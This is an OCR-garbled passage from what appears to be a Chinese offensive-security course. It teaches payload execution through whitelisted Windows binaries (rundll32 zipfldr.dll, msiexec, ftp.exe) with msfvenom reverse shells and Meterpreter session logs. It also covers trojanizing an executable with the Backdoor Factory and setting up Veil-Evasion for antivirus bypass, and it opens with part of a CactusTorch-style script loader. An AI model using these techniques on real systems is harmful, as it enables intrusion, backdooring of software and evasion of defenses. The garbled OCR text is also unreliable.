S = 5 & "AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 








S = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 





S = s & "ААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААР 
S = 5 & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAL 
S = 5 4 "ААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААР 
S = 5 8 "AAAAAAAAAAAAAAABDQAAAAQAAAA JFWAAAAKGAAAACRY AAAAGGGAAACd T eXNOZWOuUmVmbGV 
S = s & "bi5Bc3N1bWJseSBMb2FkKEJ5dGVbXSkIAAAACgSA" 


entry class - "cactusTorch" 


Bim fmt, al, d, o 
Set fmt - CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFor 
Set al - CreateObject("System.Collections.ArrayList") 


al.Add fmt.SurrogateSelector 


e 
Ф 

с 
о. 

H 


fmt.Deserialize 2(Base64ToStream(s)) 


л 
Ф 
ct 
o 
" 


d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class) 
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o.flame binary,code 


End Sub 


SetVersion 


On Error Resume Next 


Run 


If Err.Number <> 0 Then 


Debug Err.Description 


Err.Clear 


End If 


self.close 


«/script» 


1901 













* 


| 基于 白 名 单 zipfldr.dll 执 行 payload 第 十 八 季 Ј 


”请 多 喝 点 热 水 或 者 凉 白 开 ， 可 预防 肾 结 石 ， 通 风 等 。 痛 风 可 伴 发 肥胖 症 、 高 血压 病 、 糖 尿 病 、 脂 代 
_ 谢 率 乱 等 多 种 代谢 性 疾病 。 


“zipfidr.dll 简 介 : 
“zipfldr.dll 自 Windows xp 开 始 自 带 的 zip 文 件 压缩 解压 工具 组 件 。 


zipfldr.dll 所 在 路 径 已 被 系统 添加 PATH 环 境 变量 中 ， 因 此 ，zipfldr.dll 命 令 可 识别 ， 但 由 于 为 dl 文件 ， 
需 调 用 rundll32.exe 来 执行 。 


Windows 2003 默认 位 置 : 


x CiNWindowsNSystem32Nzipfldr.d11l 
— €: NWindowsNSysWOWe4Nzipfldr.dll 
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msf exploit(multi/handler) » show options 
Module options (exploit/multi/handler): 


Name Current Setting Required Description 


Payload options (windows/meterpreter/reverse tcp): 


Name Current Setting Required Description 

EXITFUNC process yes Exit technique (Accepted: '', seh, three 
LHOST 192.168.1.4 yes The listen address (an interface may be 
LPORT 53 yes The listen port 


Exploit target: 
Id Name 


0 Wildcard Target 


msf exploit(multi/handler) » exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 


пе? exploit(nulti. handler) > show options 
Module options (exploit/multi/handler) 


Name Current Setting Required Description 


Payload options (windows/meterpreter/reverse tcp): 


Мате © uired D ption 


EXITFUNC Exit technique (Accepted: '', seh, thread, process, none) 
LHOST 192.1 i The listen address (an interface may be specified) 
LPORT 53 y The listen port 


Exploit target: 
Id Name 


O Wildcard Target 


mef exploit(multi:/handler) > exploit 


[*] Started reverse TCP handler an. 192.168.1.4:53 
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pni: 


rund1132.exe zipfldr.dll,RouteTheCall \\192.168.1.119\share\rev_x86_53_exe.exe 





msf exploit(multi/handler) > exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 


[*] Sending stage (179779 bytes) to 192.168.1.3 
[*] Meterpreter session 7 opened (192.168.1.4:53 -» 192.168.1.3:5245) at 2019-01 


meterpreter » getuid 
Server username: John-PC\John 


meterpreter » getpid 
Current pid: 6988 


ler) > explait 
handler on 192 


> 192.168.1.3:5245) at 2019-01-21 04:55:44 -0500 
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ЕЛЕНЕ msiexectfAfTpayload 4h76 


基于 白 名 单 Msiexec 执 行 payload 第 八 季 补充 
Ж: 

请 多 喝 点 热 水 或 者 凉 白 开 ， 身 体 特别 重要 。 

本 季 补充 本 地 DLL 加 载 


Msiexec 简 介 : 


Msiexec 是 Windows Installer 的 一 部 分 。 用 于 安装 Windows Installer 安 装 包 (MSI) ,一 般 在 运行 
Microsoft Update 安 装 更 新 或 安装 部 分 软件 的 时 候 出 现 ， 占 用 内 存 比 较 大 。 并 且 集 成 于 Windows 
2003, Windows 7 等 。 





说 明 : 
Msiexec.exe 所 在 路 径 已 被 系统 添加 PATH 环境 变量 中 ， 因 此 ，Msiexec 命 令 可 识别 。 
基于 白 名 单 Msiexec.exe 配 置 payload : 


注 : x64 payload 


msfvenom -p windows/x64/shell/reverse tcp LHOST-192.168.1.4 LPORT-53 -f dll > Mi 


> 


配置 攻击 机 msf: 


注 : x64 payload 
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msf exploit(multi/handler) » show options 
Module options (exploit/multi/handler): 


Name Current Setting Required Description 


Payload options (windows/x64/meterpreter/reverse tcp): 


Name Current Setting Required Description 

EXITFUNC process yes Exit technique (Accepted: '', seh, three 
LHOST 192.168.1.4 yes The listen address (an interface may be 
LPORT 53 yes The listen port 


Exploit target: 


Id Мате 


9 Wildcard Target 


msf exploit(multi/handler) > exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 


mst exploit (rultishar » show options 


idule options (exploit/multi/handler) : 


Name Current Setting Required Description 


Payload options (windows /x64/meterpreter/reverse tcp): 
Name 
epted: '', seh, thread, process, none) 


; (an interface may be specified) 
The listen port 


Exploit target: 


Id Name 


O wildcard Target 


t exploit(gulti.handler) > exploit 


[s] Started reverse TCP handler on 192.168.1.4;53 


i 
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靶 机 执行 : 


msiexec /y C:NUsersNJohnNDesktopMMicropoor. геу. x64 dll.dll 





msf exploit(multi/handler) » exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 
[*] Sending stage (206403 bytes) to 192.168.1.5 
[*] Meterpreter session 26 opened (192.168.1.4:53 -» 192.168.1.5:11543) at 2019. 


meterpreter » getuid 

Server username: John-PC\John 
meterpreter » getpid 

Current pid: 7672 

meterpreter » 


Started геу 
Sending š 


Meterpreter 0500 


Serve ame: John-PCNJohn 
meterpr > getpid 

Current 7672 

meterpreter > 
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баалаар ая, атара, ams. 
痛风 可 伴 发 肥胖 症 、 高 血压 病 、 糖 尿 病 、 脂 代谢 闪 乱 等 多 种 代谢 性 疾病 。 


Ftp.exe 简 介 : 

“Ftp.exe 是 Windows 本 身 自 带 的 一 个 程序 ， 属 于 微软 FTP 工 具 ， 提 供 基本 的 FTP 访 问 。 
说 明 : 

”Ftp.exe 所 在 路 径 已 被 系统 添加 PATH 环 境 变 量 中 ， 因 此 ，Ftp.exe 命 令 可 识别 。 


Windows 2003 默认 位 置 : 


C:\Windows\System32\ftp.exe 


C:\Windows\Syswow64\ftp.exe 


- Windows 7 默认 位 置 : 


C:\Windows\System32\ftp.exe 
С: NWindowsNSysWOW64Nftp.exe 
攻击 机 : 192.168.1.4 Debian 
ŠEL: 192.168.1.3 Windows 7 
配置 攻击 机 msf: 
в: 


需 设置 参数 set AutoRunScript migrate -f 
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E. * $ а а 


msf exploit(multi/handler) > show options 


Module options (exploit/multi/handler): 


Name Current Setting Required Description 


Payload options (windows/meterpreter/reverse tcp): 





Name Current Setting Required Description 

EXITFUNC process yes Exit technique (Accepted: '', seh, three 
LHOST 192.168.1.4 yes The listen address (an interface may be 
LPORT 53 yes The listen port 


Exploit target: 


Id Name 


© Wildcard Target 
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msf exploit(multi/handler) > set AutoRunScript migrate -f 
AutoRunScript -» migrate -f 


msf exploit(multi/handler) » exploit 


mst explolt(multi: handler) > show options 


Module options (exploit/multi/handler): 


Name Current Setting Required Description 


erse tcp): 
Description 
Exit technique (Accepted: '', seh, thread, process, попе) 


The listen address (ən interface may be specified) 
The listen port 


> set AutoRunScript migrate -f 


> exploit 





echo !C:NUsersNJohnNDesktopNrev x86 53 ехе.ехе > о &echo quit >> o &ftp -n -s:o 
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msf exploit(multi/handler) » set AutoRunScript migrate -f 





AutoRunScript -» migrate -f 


msf exploit(multi/handler) » exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 

[*] Sending stage (179779 bytes) to 192.168.1.3 

[*] Meterpreter session 10 opened (192.168.1.4:53 -> 192.168.1.3:5530) at 2019-6 
[*] Session ID 10 (192.168.1.4:53 -» 192.168.1.3:5530) processing AutoRunScript 
[!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate. 

[!] Example: run post/windows/manage/migrate OPTION-value [...] 

[*] Current server process: rev x86 53 exe.exe (8832) 

[*] Spawning notepad.exe process to migrate to 


[*] Migrating to 8788 


set AutoRunScript migrate -f 
> exploit 
Started rev 


Sending е 
terpreter ed 92.16 4; -> 192 ; at 2019-01-21 05:14:57 -0500 


on ID 10 (192.168 02.168.1. ) processing AutoRunScript ‘migrate -f' 
terpreter scrip ‹ 
xample: run po: 
Current serv 6 e.exe 
Spawning notepad.exe process to migrate to 
Migrating to 
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网 络 安全 学 习 方法 论 之 体系 的 重要 性 —— 


如 果 你 分 享 的 内 容 过 于 真实 ， 你 就 没有 发 表 机 会 ， 你 要 完全 假 了 呢 ， 又 没有 读者 去 看 ， 你 可 以 在 这 
个 通道 里 ， 真 一 会 儿 假 一 会 儿 地 往 前 走 ， 最 重要 的 还 是 要 往 前 走 。 Micropoor 





古人 半 部 论语 治 天 下 ， 读 书 考 功 只 须 熟 读 四 书 ， 而 四 书 加 起 来 不 过 区 区 5 万 字 。 可 见 网 络 安全 学 习 
知识 体系 的 建立 是 重 中 之 重 。 


古人 将 一 个 职业 划分 为 7 个 阶段 ， 既 : 

8: 自愿 和 靠 人 监督 的 人 

(t: 能 力 不 足 ， 肯 自愿 学 习 的 人 

I: 老 老实 灾 ， 按 规矩 做 事 的 人 

Е: 精通 一 门 技艺 或 手艺 的 人 

师 : 掌握 了 规律 ， 又 能 将 其 传授 给 他 人 的 人 

家 : 有 固定 的 信念 ， 让 别人 生活 的 更 好 的 人 

С ж: 精通 事理 ， 通 达 万 物 的 人 

С 同样 网 络 安全 学 习 也 有 10 个 阶段 划 ， 既 ; 

її: 自愿 或 靠 人 监督 的 人 

”学 : 能 力 不 足 ， 肯 自愿 学 习 的 人 

zh: 老 老 实 实 ， 按 课本 或 教学 实践 的 人 

оі 记录 每 次 实践 或 学 习 心 得 体会 并 总 结 的 人 

ЖЖ: 建立 适合 自己 的 体系 ， 并 能 把 知识 碎片 化 结合 到 自我 体系 的 人 
间 : 体系 建立 后 ， 重 新 归纳 更 新 知识 ， 并 体系 重新 结构 化 的 人 
BS: 掌握 了 规律 ， 又 能 将 其 传授 给 他 人 的 人 

带 团队 : 有 固定 的 信念 ， 带 领 团队 或 集体 形成 合力 的 人 

ши: 可 以 传授 道理 、 教 授 学 业 、 解 答疑 难 问题 ， 指 路 人 

Ел: 培养 出 比 自己 优秀 和 强大 的 人 

只 有 体系 化 的 知识 结构 才能 教导 你 思考 问题 、 引 导 你 洞察 趋势 、 指 导 你 展开 行动 。 
什么 是 体系 ? 

体系 的 本 质 是 碎片 化 知识 点 的 灵活 申 联 与 应 用 

识 体系 是 基于 人 而 存在 的 ， 世 上 不 存在 不 同 的 人 完全 相同 的 知识 体系 
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什么 是 知识 体系 ? 


在 我 的 定义 中 ， 知 识 体系 是 跟 碎 片 知识 相对 应 的 概念 ， 指 高 度 有 序 的 知识 Bo EHEH, енд 
部 分 组 成 : 一 是 大 量 的 知识 点 ， 二 是 有 序 的 结构 。 


建立 体系 的 过 程 ? 
整理 知识 碎片 化 





建立 知识 框架 

形成 知识 体系 

碎片 化 知识 点 纳入 体系 中 

王国 维 在 《人间 词话 》 中 说 ， 古 今 之 成 大 事业 、 大 学 问 者 ， 必 经 过 三 种 之 境界 : 
昨夜 西风 凋 棉 树 ， 独 立 高 楼 ， 望 尽 天 涯 路 

衣 带 渐 宽 终 不 悔 ， 为 伊 消 得 人 慌 怪 

众 里 寻 他 千百度 ， 著 然 回 首 ， 那 人 却 在 灯火 六 处 

爱 德 加 .戴尔 提出 了 一 套 学 习 模型 : 模型 主要 分 别 为 被 动 学 习 与 主动 学 习 的 一 个 过 程 。 


同时 提出 ， 学 习 效果 在 30% 以 下 的 几 种 传统 方式 ， 都 是 个 人 学 习 或 被 动 学 习 ; 而 学 习 效果 在 50% 以 
上 的 ， 都 是 团队 学 习 、 主 动 学 习 和 参与 式 学习 。 


“输出 "是 最 好 的 学 习 方 式 ,“ 输 出 "的 本 质 是 体系 重新 结构 化 。 





这 里 总 结 了 如 下 经 常 碰 到 的 问题 ， 值 得 每 一 位 网 络 安全 从 业 人 员 深思 : 
不 知道 怎么 学 ? 

不 知道 学 哪个 方向 ? 

越 学 越 不 会 ? 

感觉 自己 跟 不 上 知识 更 新 的 速度 ? 

从 事 网 安 工作 若干 年 后 ， 感 觉 遇 到 技术 瓶颈 ， 怎 么 突破 ? 

工具 /技术 招式 越 来 越 多 ， 怎 么 办 ? 


1913 











”从 事 管理 工作 后 ， 没 有 时 间或 者 精力 学 习 技术 怎么 办 ? 

| 方法 论 结合 于 实战 应 用 ， 请 参考 之 前 的 文章 如 下 : 

С. 体系 的 本 质 是 知识 点 串联 

”结语 : 

在 每 次 分 享 的 同时 ， 深 深 发 现 ， 原 来 分 享 ， 才 是 我 最 好 的 老师 。 


BRST, MRR, ABA. STR, BAAR tie, BEFA, ВЕЗЕ 
RIZE. PERRERA ABER, BIN +H, BPA, ARB HRS 

” 属 。”"， 愿 每 一 位 读者 能 找到 自己 能 融合 贯通 的 “武功 "， 在 结合 吞噬 其 他 “招式 "， 如 行云流水 ， 石 便 
”是 器 ， 枝 便 是 剑 。 
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第 十 三 章 工具 优化 及 分 享 


解决 msfvenom 命 令 自 动 补 全 


本 课 是 针对 前 第 1-20 课 时 的 msfvenom 生 成 payload 的 自动 补 全 命令 补充 。 虽 msfvenom 强 大 ， 同 样 
有 着 非常 繁琐 的 参数 ， 参 数 强大 ， 意 味 着 会 增加 工作 效率 ， 但 它 并 不 像 MSF 有 命令 补 全 功能 ， 故 本 
课 吸取 前 20 课 经 验 ， 自 动 补 全 msfvenom 的 参数 。 


需要 zsh 的 支持 : 


root@John:~# cat /etc/shells 
# /etc/shells: valid login shells 
/bin/sh 

/bin/dash 

/bin/bash 

/bin/rbash 

/usr/bin/screen 

/bin/zsh 

/usr/bin/zsh 

/usr/bin/tmux 

root@John:~# echo $SHELL 
/bin/bash 


screen 


25 | 1 
usr/bin/tmux 

:-% echo $SHELL 
bin/bash 





复制 附录 A 到 ~/.oh-my-zsh/custom/plugins/msfvenom 文 件 夹 下 GE: 没有 
msfvenom 上 目录， 创建 即 可 ) 


root@John:~/.oh-my-zsh/custom/plugins/msfvenom# pwd 
/root/.oh-my-zsh/custom/plugins/msfvenom 
rootQJohn:-/.oh-my-zsh/custom/plugins/msfvenom& 15 
-msfvenom 


/ .oh-my-zsh/custom/plugins/msfvenoms 
sh/custom/plug sfveno 


h-my-zsh/custom/plugins msfvenom# ls 
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编辑 ~/.zshrc 文 件 : 


root@John:~# nano -/.zshrc 


root@John:~# nano -/.zshrc 
root@John:~# cat -/.zshrc 
plugins=(msfvenom) 


GNU nana 3.2 





更 新 : 


root@John:-# source -/.zshrc 


效果 如 下 : 








. #compdef msfvenom ж ote жест; ~ 
_ gautoload 


zsh completion for msfvenom in Metasploit Framework Project (https://www.metas 
github: https://github.com/Green-m/msfvenom-zsh-completion 

author: бгееп-т (greenm.xxooQgmail.com) 

license: GNU General Public License v3.0 


Copyright (c) 2018, Green-m 
All rights reserved. 


ЗЕ 3E ЗЕ db dE ЗЕ ЧЕ SS ЕЕ Ж 


VENOM CACHE FILE--/.zsh/venom-cache 


' venom-clear-cache() 4 
rm $VENOM_CACHE_FILE 


— venom-cache-payloads() í 


if [ -x "$(command -v msfvenom)" 1 
then 

VENOM="msfvenom" 
elif | -n "$ comp command1" ] 


then 

VENOM-$ comp commandi 
else 

echo "Cound not find msfvenom path in system env, please run msfvenc 
[f 


if [[ ! -d $(VENOM CACHE FILE:h) ]]; then 
mkdir -p $(VENOM CACHE FILE:h) 
ГІ. 


if [[ ! -f $VENOM CACHE FILE 11; then 


echo -n "(...caching Metasploit Payloads...)" 


$VENOM --list payload|grep -e "A.*N/" | awk '{print 91)! >> $VENOM CACHE Е 
fi 


~ -msfvenom() í 


local curcontext="$curcontext" state line 
typeset -A opt_args 
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arguments -C \ E 
"(-һ --help)'(-h,--helpj'[show help]' \ 
'(-1 --list)'(-1,--listj]'[List all modules for type. Types are: payloads, edi 
'(-p --payload)'(-p,--payload)'[Payload to use (--list payloads to list, -13 
'(--list-options)--list-options[List --payload «value» standard, advanced ang 
'(-f --format)'(-f,--format)'[Output format (use --list formats to list)]' X 
'(-e --encoder)'{-e,--encoder}'[The encoder to use (use --list encoders to HE 
'(--smallest)--smallest[Generate the smallest possible payload using all avail 
'(--encrypt)--encrypt[The type of encryption or encoding to apply to the shell 
'(--encrypt-key)--encrypt-key[A key to be used for --encrypt]' \ 
'(--encrypt-iv)--encrypt-iv[An initialization vector for --encrypt]' \ 
'(-a --arch)'{-a,--arch}'[the architecture to use for --payload and --encoders 
'(--platform)--platform[The platform for --payload (use --list platforms to 11 
"(-о --out)'(-0,--out)'[Save the payload to a file]' \ 
'(-b --bad-chars)'{-b,--bad-chars}'[Characters to avoid example: "Nx@@Nxff"]' 
'(-n --nopsled)'{-n, --nopsled}'[Prepend a nopsled of N[lengthN] size on to the 
'(--encoder-space)--encoder-space[The maximum size of the encoded payload (def 
'(-i --iterations)'{-i,--iterations}'[The number of times to encode the payloe 
'(-c --add-code)'(-c,--add-code)'[Specify an additional win32 shellcode file t 
'(-x --template)'(-x,--template)'[Specify a custom executable file to use as e 
'(-k --keep)'(-k,--keep)'[Preserve the --template behaviour and inject the рау 
'(-v --var-name)'(-v,--var-name)'[Specify a custom variable name to use for ce 
'(-t --timeout)'{-t,--timeout}'[The number of seconds to wait when reading the 
'*: ((%( msfvenom options))' && ret=0 







lastword=${words[${#words[@]}-1]} 


case "$lastword" in 
(-pl--payload) 
_values 'payload' $(  msfvenom payloads) 


`. 
ЖҰР, 


(-1|--115%) 
local lists-('payloads' 'encoders' 'nops' 'platforms' 'archs' 'encry 
.values 'list' $lists 


(-encrypt) 
local encrypts=('aes256' 'base64' 'rc4' 'xor') 
.values 'encrypt' $encrypts 


(-a|--arch) 
.values 'arch' $(. msfvenom archs) 
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(-platform) 
.values 'platform' $(. msfvenom platforms) ,aan S Sd 


(-f|--format) 
.values 'format' $(  msfvenom formats) 


(-e|--encoder) 
_values 'encoder' %( msfvenom_encoders) 


(-o|--out|-x|--template|-c|--add-code) 
_files 


esac 


_msfvenom_payloads(){ 
local msf_payloads 


# we cache the list of packages (originally from the macports plugin) 
_ venom-cache-payloads 
-msf_payloads=*cat $VENOM CACHE FILE^ 


for line in $msf payloads; do 
. echo "$line" 
. done 


nsfvenom_archs(){ 
local archs 

| archs=( 

| 'aarch64' 

X 'armbe' 
 'armle' 
"'cbea' 
"'cbea64' 
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'mips' 
'mips64' 
'mips64le' 
'mipsbe' 
'mipsle' 
'nodejs' 
'php' 
‘ppc! 
'ppc64' 
'ppce4le' 
'ppce500v2' 
'python' 
tp! 
'ruby' 
'sparc' 
'sparc64' 
"tty! 
"x64' 
'x86' 
'x86 64' 
'zarch' 


) 


for line in $archs; do 
echo "$line" 
done 


— msfvenom encoders()( 
local encoders 
encoders-( 

'cmd/brace' 
'cmd/echo' 
"ста/депегіс sh' 
'cmd/ifs' 
'cmd/per1' 
'cmd/powershell base64' 
'cmd/printf php та! 
'generic/eicar' 
'generic/none' 
'mipsbe/byte xori' 
'mipsbe/longxor' 
'mipsle/byte xori' 
'mipsle/longxor' 
'php/base64' 
'ppc/longxor' 
'ppc/longxor tag' 
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'ruby/base64' 
'sparc/longxor tag' 
'x64/xor' 

'x64/xor dynamic' 
'x64/zutto dekiru' 
'x86/add sub' 
'x86/alpha mixed' 
'x86/alpha upper' 
'x86/avoid underscore tolower' 
'x86/avoid utf8 tolower' 
'x86/bloxor' 

'x86/bmp polyglot' 
'x86/call4 dword xor' 
'x86/context cpuid' 
'x86/context stat' 
'x86/context time' 
'x86/countdown' 
'x86/fnstenv mov' 
'x86/jmp call additive' 
'x86/nonalpha' 

'x86/nonupper ' 

'x86/opt sub' 

'x86/service' 
'x86/shikata ga nai' 
'x86/single static bit' 
'x86/unicode mixed' 
'x86/unicode upper' 

'x86/xor dynamic' 


for line in $encoders; do 
echo "$line" 
done 


msfvenom_platforms(){ 
= local platforms 
| platforms-( 
paix’ 
'android' 
 'apple ios' 
ЕГІЗІ 
бесі! 
| 'cisco' 
"'firefox' 
"freebsd! 
‘hardware! 
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Ball ea au 
'java' 
‘javascript' 
‘juniper' 
'linux' 
'mainframe' 
'multi' 
'netbsd' 
'netware' 
'nodejs' 
'openbsd' 
'osx' 

' php' 
'python' 

tr! 
'ruby' 
'solaris' 
'unix' 
'unknown' 





'windows' 


) 


for line in $platforms; do 
echo "$line" 
done 


__msfvenom_formats(){ 
local formats 
formats=( 

‘asp! 
'aspx' 
'aspx-exe' 
ах152 
"aJa" 

'elf' 
'elf-so' 
'exe' 
'exe-only' 
'exe-service' 
'exe-small' 
'hta-psh' 
'jar' 

‘jsp! 
'loop-vbs' 
'macho' 
'msi' 
'msi-nouac' 


1923 


'osx-app' 
'psh' а 
'psh-cmd' 
"psh-net' 
'psh-reflection' 
'vba' 
'vba-exe' 
'vba-psh' 
"ур" 
"маг" 

'bash' 
ic! 
'csharp' 
“дм! 
' dword' 
'hex' 
"ауа! 
15 Бе. 
5ле" 
'num' 
регі! 
I p1' 
'powershell' 
'р51' 
'ру' 
'python' 
'raw' 
‘rb! 
'ruby' 
sh! 
'vbapplication' 
'vbscript' 


) 


for line in $formats; do 
echo "$line" 
done 





* For most common options, not accurately 
Sfvenom_options(){ 
local options 
options=( 
LHOST= \ 
LPORT= \ 
EXITFUNC= \ 
RHOST= \ 
StageEncoder= \ 
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AutoLoadStdapi- N 
AutoRunScript- \ — ! » i 
AutoSystemInfo- N 
AutoVerifySession- Х 
AutoVerifySessionTimeout- N 
EnableStageEncoding= N 
EnableUnicodeEncoding- N 
HandlerSSLCert- \ 
InitialAutoRunScript- \ 
PayloadBindPort- N 
PayloadProcessCommandLine= \ 
PayloadUUIDName- N 
PayloadUUIDRaw= \ 
PayloadUUIDSeed- \ 
PayloadUUIDTracking- \ 
PrependMigrate= \ 
PrependMigrateProc= \ 
ReverseAllowProxy= N 


бсо eae 


Г 
d 
4 
є 


ReverseListenerBindAddress= N 
ReverseListenerBindPort= N 
ReverseListenerComm= N 
ReverseListenerThreaded= N 
SessionCommunicationTimeout- N 
SessionExpirationTimeout- \ 
SessionRetryTotal- \ 
SessionRetryWait- \ 
StageEncoder- \ 
StageEncoderSaveRegisters- Х 
StageEncodingFallback- N 
StagerRetryCount- \ 
StagerRetryWait- \ 

VERBOSE- Х 

WORKSPACE- 


echo $options 


J 


#_msfvenom "$Q" 
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工具 介绍 -the-backdoor-factory (第 九 课 ) 


项 目地 址 : 


原理 : 可 执行 二 进 制 文件 中 有 大 量 的 00， 这 些 00 是 不 包含 数据 的 ， 将 这 些 数据 替换 成 payload， 并 
目 在 程序 执行 的 时 候 ，jmp 到 代码 段 ， 来 触发 payload。 


以 项 目 中 的 过 磅 系统 为 例 : 


root@John:~/Desktop# git clone https://github,com/secretsquirrel/the-backdoor -fa 


// 3 сһе-һаскаоог-Ғас%огу 


Desktops git clone https: //github.com/secretsquirrel/the-backdoor-factory.git 
'the-backdo ; 


elta 0), pack-re 1091 
MiB | 145.00 Kı done, 





root@John:-/Desktop/the-backdoor-factory# ./backdoor.py -f -/demo/guobang.exe -S 


// 检 测 是 否 支持 后 门 植 入 
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ctory# ./backdoor.py -f -/demo/guobəng.exe + 
b t у П ) ( Ri 4 
S E ; x <... (00 } 


2). лу 


Author: 

Email: the .midnite.runr{-at ]qmall<d o-t>com 
Twitter:  @midnite_runr 

IRC: freenode.net #BDFactory 


Version: 3.“ 


[*] Checking if binary 15 supported 
[*] Gathering file info 

[*] Reading win32 entry instructions 
/root/demo/guabang.exe is supported. 





rootQJohn:-/Desktop/the-backdoor-factorys ./backdoor.py -f -/demo/guobang.exe -c 


// 测 斌 裂缝 空间 size150 
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: -/Desktop/the-backdoor-factory& ./backdoor.py -f -/demo/quobang.exe -C “| 250 

















Author: Joshua Pitts 

Email: the.midnite.runr[-at ]gmailed o-t»com 
Twitter: @midnite_runr 

IRC: freenode.net sBDFactory 


Version: 


[+] Checking if binary is supported 
[+] Gathering file info 

*| Reading win32 entry instructions 

joking for caves with a size of 150 bytes (measured as an integer 

Looking for caves 
section 

«Begin Cave 0x360 

End of Cave Ох400 
Size of Cave {int} 160 
JOO IO OOO OOO ICI ZOCOR OO E E E ICR ORR E 
No section 

‘Begin Cave 0x202c94 

‘End of Cave Ox202e08 
Size of Cave (int) 372 
CSO OOOO IOI ORO HORROR ICICI HORI I OF 
No section 
-»Begin Cave Ox 

>End of Cave 0х20820с 
Size of Cave (int) 209 
COO AOAO AO O AO Л К КК OR К К ЕЕЕ ЕЕ IOI HE 


‘Begin Cave Ox20b20f 

>End of Cave Qx20b401 
Size af Cave (int) 498 
ДАЛ 272%%%%%271%2223%53%222%22552 222522222220 
Мо section 

Begin Cave 0х22с#08 

"End of Cave Ox22d004 
5126 of Cave (int) 252 
+++ЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖУЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЯЖЖИЖЖЖУЖ 


We have a winner: .rsrc 


rootQJohn:-/Desktop/the-backdoor-factory& ./backdoor.py -f -/demo/guobang.exe -s 


// 碍 看 可 用 payload 





Zbackdoor.py -f -/demo/quobanq.exe `< "m 


Author: Joshua Pitts 

Email: the.midnite.runr[-at ]gmail<d o-t»com 
Twitter: | gmidnite runr 

IRC: freenode.net #BDFactory 


Version: 


[*] In the backdoor module 
[*] Checking if binary is supported 
[*] Gathering file info 
[*] Reading win32 entry instructions 
The following WinIntelPE32s are available: (use -s) 
cave miner inline 
iat reverse tcp inline 
tcp inline threaded 
^ (| tcp stager threaded 
iat user supplied shellcode threaded 
meterpreter reverse https threaded 
reverse shell tcp inline 
e tcp stager threaded 
user supplied shellcode threaded 





root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f -/demo/guobang.exe -tł 





// 插 入 payload， 并 生成 文件 。 
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the-bac — -factor ys 2/8 


)shua Pitts 
lte.runr[-3t ]gma 


unr 


HHHHHHHHHHTHHTSUHAUSAHEEHAHMHTMIIIHSE 
ез can be used to i 


see? Use jump, Single, append, ог ignore.** 


Begin 





rootQJohn:-/Desktop/the-backdoor-factory& md5sum ./guobang.exe /root/demo/guobar 
// 对 比 原 文件 与 生成 文件 MD5 值 
he-backdoor -factory/backdooreds md5sum ./quobang.exe /root/demo/quobang.exe 


aa63e8dbbOc414 uobang.exe 
75a5dfd70 /root/demo/gquobang. exe 


/Desktop/the-backdoor-factory/backdooreds | 





rootQJohn:-/Desktop/the-backdoor-factory& du -k ./guobang.exe /root/demo/guobanc 


/7 对 比 文件 大 小 






20102 Јоһп: -/Desktop/the-backdoor - sieeve pee Боры du -b . 
-/94496 . /quobang .exe 

| /root/demo /quobang. exe 
-/Desktop/the-backdoor - (aq UL M OO rede || 
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msf » use exploit/multi/handler 

msf exploit(handler) » set payload windows/meterpreter/reverse tcp 
payload -» windows/meterpreter/reverse tcp 

msf exploit(handler) » set lhost 192.168.1.111 

lhost -» 192.168.1.111 

msf exploit(handler) > set lport 8080 

lport -» 8080 

msf exploit(handler) » exploit -j 


// 开 启 本 地 监听 


Se exploit/multi ‘handler 
it {i r) > set payload windows/meterpreter/reverse_tcp 
> eterpreter/reverse tcp 
loit( handler} > set lhost 192.168.1,111 
^ 192.168.1.111 
> set lport 8080 








loit( ler) > exploit -1 
(ploit as background job. 
Started reverse TCP handler on 192.168.1.111:8080 
Starting the payload handler... 
// 打 开 软 件 
名 称 | 修改 日 其 | 类 型 ШЕЛІ 
ini 2017/11/25 22:13 xe 
config, ini 2017/11/25 22:13 MERA | KB 
©} guobang. exe 
& mobang 原 文件 exe 201771078 9:05 应 用 程序 2, 729 KB 


xi 





C Bandes 
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meterpreter » getuid 


Server username: John-PC\John 


// 确 定 目标 





C:\Dipconfig | findstr "192.168." 
ІРәа ҢІ... 25245052 199.168.1.100 
MITES : 273 7: 192.168.1.1 
Іро4 db... ЖАР НА 195.168.136.1 


ЇРӨЗ ЖЕ. . А eS 45 469.421 


C: hostname 
John-PC 


D 





Started reverse TCP handler on 192.168.1.111: 

Starting the payload handler... 

Sending stage (957487 bytes) to 192 

Meterpreter s оп 5 opened (192.1698.1. ;8080 -> 192.168,1.100: 


meterpreter » getuid 


Server username: John-PC\John 








1932 





工具 介绍 Veil-Evasion (第 十 一 课 ) - 


Veil-Evasion 是 与 Metasploit 生 成 相 兼容 的 Payload 的 一 款 辅助 框架 ， 并 可 以 绕 过 大 多 数 的 杀 软 。 
Veil-Evasion 并 没有 集成 在 kali， 配 置 sources.list， 可 直接 apt-get。 


root@John:~/Deskto# cat /etc/apt/sources.list 

# 中 科大 

deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 

# 阿 里 云 

#deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib 
4deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib 

# 清 华 大 学 

#deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free 
&deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib nor 
# 浙 大 

#deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free 
Hdeb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free 

# 东 软 大 学 

